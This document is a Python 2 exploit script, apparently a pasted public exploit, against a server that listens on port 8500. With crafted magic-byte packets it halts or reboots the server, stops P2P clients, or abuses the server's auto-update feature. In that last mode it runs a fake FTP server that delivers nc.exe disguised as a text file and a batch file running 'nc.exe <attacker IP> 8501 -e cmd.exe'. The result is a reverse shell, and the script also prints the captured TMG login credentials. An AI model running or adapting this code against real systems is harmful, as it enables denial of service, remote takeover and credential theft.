#!/usr/bin/env python2# -*- coding: utf-8 -*-import sysimport structim

1. #!/usr/bin/env python2
2. # -*- coding: utf-8 -*-
3.  
4. import sys
5. import struct
6. import time
7. import socket
8. from threading import Thread
9.  
10. #
11. # Change this IP to your public IP address.
12. #
13. PUBLIC_IP = "192.168.0.1"
14.  
15. #
16. # Don't forget to open ports 21 and 8501 in your
17. # OpenOffice.org firewall
18. #
19. SRV_PORT = 8500
20. FTP_PORT = 21
21. SHELL_PORT = 8501
22.  
23. MAGIC = "\x15\x66\x00\x78"
24. HALT = "\x65"
25. REBOOT = "\x66"
26. STOP = "\x70\x00\x00"
27. UPDATE = "\x82"
28. OK = "\x01"
29.  
30. def usage (msg = None):
31.  
32. if msg: print "Error: %s\n" % msg
33.  
34. print "Usage: %s IP command" % sys.argv[0]
35. print
36. print "commands:"
37. print "- halt shutdown the server"
38. print "- reboot reboot the server"
39. print "- stop stop P2P clients (eMule and Shareaza)"
40. print "- pwn use a vulnerability in the Auto Update feature to
41. get a remote shell"
42.  
43. sys.exit(0)
44.  
45. class fake_ftpd(Thread):
46.  
47. def __init__ (self):
48. Thread.__init__(self)
49. self.s = None
50. f = open('./nc.exe', 'rb')
51. nc = f.read()
52. f.close()
53. batch = "@echo off\r\n"
54. batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
55. batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
56. self.files = {
57. 'script/script_diff2/execute_update.bat': batch,
58. 'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
59. }
60.  
61. def run (self):
62. self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
63. self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
64. self.s.bind(("", FTP_PORT))
65. self.s.listen(1)
66. self.s.listen(0x1337)
67. print "[+] Waiting for FTP connection..."
68.  
69. conn, addr = self.s.accept()
70.  
71. print "[!] FTP - %s connected!" % addr[0]
72. conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
73.  
74. while True:
75. data = conn.recv(1024)
76. if not data:
77. break
78.  
79. args = data.rstrip().split(' ')
80.  
81. if data.startswith('CWD'):
82. conn.send('250 CWD command successful.\r\n')
83.  
84. elif data.startswith('TYPE'):
85. conn.send('200 TYPE set.\r\n')
86.  
87. elif data.startswith('USER'):
88. conn.send('331 Password required.\r\n')
89. username = data.split(' ')[1].rstrip()
90.  
91. elif data.startswith('PASS'):
92. conn.send('230 User logged in.\r\n')
93. password = data.split(' ')[1].rstrip()
94. print "[!] TMG credentials: %s/%s" % (username, password)
95.  
96. elif data.startswith('PORT'):
97. arg = args[1].split(',')
98. ip = '.'.join(arg[:4])
99. port = int(arg[4]) * 256 + int(arg[5])
100. sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
101. sdata.connect((ip, port))
102. conn.send('200 PORT command successful.\r\n')
103.  
104. elif data.startswith('RETR'):
105. conn.send('150 Opening BINARY mode data connection\r\n')
106. buf = self.files.get(args[1], 'file not found\r\n')
107. sdata.send(buf)
108. sdata.close()
109. conn.send('226 Transfer complete\r\n')
110. print "[+] File \"%s\" transfered..." % args[1]
111.  
112. elif data.startswith('NLST'):
113. conn.send('150 Here comes the directory listing.\r\n')
114. if len(args) == 1:
115. listing = ''
116. else:
117. listing = args[1]
118. sdata.send(listing + '\r\n')
119. sdata.close()
120. conn.send('226 Directory send OK.\r\n')
121.  
122. elif data.startswith('QUIT'):
123. conn.send('221 Goodbye.\r\n')
124. break
125.  
126. else:
127. conn.send('500 Unknown command.\r\n')
128.  
129. conn.close()
130.  
131.  
132. def do_stuff (host, cmd):
133.  
134. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
135. s.settimeout(5)
136.  
137. try:
138. print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
139. s.connect((host, SRV_PORT))
140.  
141. except Exception, e:
142. print("[?] Error: %s" % e)
143. s.close()
144. return ;
145.  
146. print "[+] Sending evil packet..."
147.  
148. if cmd == 'halt':
149. s.send(MAGIC + HALT)
150. print "[!] Done!"
151.  
152. elif cmd == 'reboot':
153. s.send(MAGIC + REBOOT)
154. print "[!] Done!"
155.  
156. elif cmd == 'stop':
157. s.send(MAGIC + STOP)
158. data = s.recv(1)
159.  
160. if data and data[0] == OK:
161. print "[!] Done!"
162. else:
163. print "[!] Error :("
164.  
165. elif cmd == 'pwn':
166. ftpd = fake_ftpd()
167. ftpd.daemon = True
168. ftpd.start()
169.  
170. command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
171. socket.ntohs(FTP_PORT)) + "\x00\x00"
172. s.send(MAGIC + UPDATE + command)
173. data = s.recv(1)
174.  
175. if data and data[0] == OK:
176. s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
177. s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
178. s2.bind(("", SHELL_PORT))
179. s2.listen(1)
180.  
181. conn, addr = s2.accept()
182. print "[!] SHELL - %s connected!" % addr[0]
183. print conn.recv(4096)
184.  
185. while True:
186. cmd = raw_input()
187. if cmd == "quit" or cmd == "exit":
188. break;
189. conn.send(cmd + "\r\n")
190.  
191. data = ""
192. conn.settimeout(None)
193. data = conn.recv(1024)
194. conn.settimeout(1)
195.  
196. while True:
197. line = ""
198. try:
199. line = conn.recv(1024)
200. except socket.timeout:
201. break
202. if line == "":
203. break
204. data += line
205.  
206. tab = data.split("\n")
207. print "\n".join(tab[1:-1])
208.  
209. conn.close()
210. else:
211. print "[!] Error :("
212.  
213. s.close()
214.  
215. if __name__ == '__main__':
216.  
217. if len(sys.argv) < 3:
218. usage("Not enough arguments")
219.  
220. (_, host, cmd) = sys.argv
221.  
222. if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
223. usage('Invalid command ("%s")' % cmd)
224.  
225. do_stuff(host, cmd)
226.  
227. sys.exit(0)